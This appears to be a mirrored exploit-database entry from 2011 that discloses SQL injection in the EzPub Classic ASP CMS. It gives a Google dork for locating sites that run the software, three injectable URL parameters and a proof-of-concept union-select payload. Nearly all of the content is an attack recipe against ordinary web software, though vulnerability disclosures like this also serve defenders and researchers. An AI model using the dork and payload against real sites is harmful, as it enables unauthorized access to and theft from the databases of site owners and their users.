[] NeoSense
E X P L O I T S
title author type platform port cve id

EzPub Simple Classic ASP CMS - SQL Injection

Author: p0pc0rn
type: webapps
platform: asp
port: 
date_added: 2011-03-08 
date_updated: 2011-03-08 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 
Title:    EzPub - Simple Classic ASP CMS Vulnerable to SQL Injection
Vendor:   http://www.soft4web.ro
Found by: p0pc0rn 08/03/2011
Dork:     intext:"Powered by EZPub"


SQL - Microsoft JET Database Engine error
------------------------------------------

view_article.asp?item=[SQL]
http://site.com/page.asp?pID=[SQL]
http://site.com/display.asp?sortby=sections&sID=[SQL]

POC
---

http://site.com/view_article.asp?item=1 union select 1 from test.a

thanks,
-p0pc0rn-
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.